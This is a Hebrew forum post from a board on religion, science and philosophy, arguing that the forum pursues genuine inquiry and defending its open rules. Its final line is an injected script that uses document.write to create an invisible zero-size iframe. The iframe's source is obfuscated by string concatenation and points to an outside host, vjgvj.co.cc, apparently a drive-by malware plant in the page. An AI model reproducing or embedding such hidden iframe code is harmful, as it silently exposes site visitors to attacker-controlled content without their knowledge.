האמת היא שתמיד תהיינה הנחות כל שהן בתחילתה של כל חקירה. - נכון מאד. אמנם השאלה היא אם אלו הנחות הכרחיות או מוצדקות. ולכל הפחות צריך שתהיה מודעות להן.
ובעצם גם בפורום כאן ישנם עדיין גבולות מסויימים שנשמרים - הגבולות היחידים לדיון בפורום הם: דרך ארץ וכתיבה מכובדת. כל נושא שמתאים לנושא המרכזי, יחסי דת ויהדות עם מדע ופילוסופיה, כל נושא כזה מתאים. ואין שום מיגבלה.
אם כוונתך שיש כותבים המגבילים את ספקנותם, זה יתכן, אבל זה לא חסרון בפורום. זו בחירה אישית שלהם. ויתכן שיש לה הנמקות שכדאי להכיר.
ואם כן לפי אלי גם כאן אין ולא יכולה להיות חקירה אמיתית. - מהי חקירה אמיתית? ראה באשכול החדש שפתחתי שאין דיון בלי הנחות יסוד וכל מה שצריך הוא התבוננות עצמית לפיתוח מודעות. וזה מה שאני מבין ב"חקירה אמיתית".
יתכן שכוונתו של אלי היא לשתי נקודות שקשה ליישם:
א. בדיקה של כל רעיון ולו גם כזה שקשה מאד לוותר עליו (יש אלוקים? איך יודעים שהוא התגלה בסיני?)
ב. יישום של מסקנה ספקנית או שוללת (האם באמת אפשר לוותר על אמונה בקבלה/בתורה? האם באמת יש מקום לשינוי בהלכה למעשה אם מתברר מתוך עיון שעלינו להבין אחרת את הגמרא או ההלכה? אלו כמובן שתי רמות שונות לגמרי של דיון ובדיקה ושינוי!)
כמדומה שאלי התכוון בעיקר לסעיף ב. יש כאן כאלו שיש להם תכלית לכתיבתם. זו יכולה להיות תכלית לקרב אחרים (מודה באשמה לגבי) או לפתוח את שכלם וליבם נגד משהו (כוונתי ליסודות היהדות... והיו כאלו). אמנם אני חלוק עליו. חקירה אמיתית ברמת הכוונה היא על מנת ליישם מה שמסיקים. יש כאלו שטענו כאן בפורום שיש התחמקות מהסקת מסקנות מעשיות מדיונים ולכן זו לא "חקירה אמיתית". כפי שאני משתדל להבהיר, מכמה בחינות זה לא רלוונטי לפורום. הפורום עוסק רק בדיונים. כל דיון וכל תגובה שנכתבים מתוך הבנתו האמיתית, לפי מיטב יכולתו של הכותב, הם אמיתיים. כלומר מצד המניע והתרומה ובעיקר הנדרש להשתתפות.
שורה אחרונה: צריך להבהיר למה הכוונה ב"חקירה אמיתית" כדי שתהיה משמעות לבדוק אם אכן צודק אלי.
לפי דעתי, בניגוד לו, הפורום כן עוסק בחקירות אמיתיות וזו "מטרת הפורום". (בתשובה לשאלתך בכותרת).
ו
אם ככה אז מה טוב הפורום יותר מכל במה אחרת? - תלוי לאיזו במה משוים אותו. יש במות לעיון, אם כי למעשה לא מוכרת לי שום בימה דומה לשלנו. כלומר שום בימה שהיא פתוחה לקהל (ולאחרונה, עקב התקפות של חבר לשעבר מתוסכל, צריך לקבל אישור כתיבה אם כי זה פתוח לכל). שום במה שבה יש דיונים על פילוסופיה ודת ויהדות. ושום במה שבה יש את ההרכב של חברינו.
זה לא אומר שאין. זה אומר שלי לא מוכרת. אם תציין לינקים למקומות דומים או טובים מאלו אשמח להכירם.
בכל אופן, גם אם יש בימות מצויינות מקבילות, זה לא חסרון אצלנו, האין זאת?
ואם ככה אז מה טוב הפורום יותר מכל במה אחרת? בגלל שהוא הלך צעד אחד או שנים קדימה? אבל עדיין נותרו לו עוד צעדים רבים לצעוד לדעתי כדי שאלי יוכל לקרוא לחקירות הפורום חקירות אמיתיות.
- כאמור, מטרתו לא להתחרות באחרים אלא להיות טובים עבור עצמנו.
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>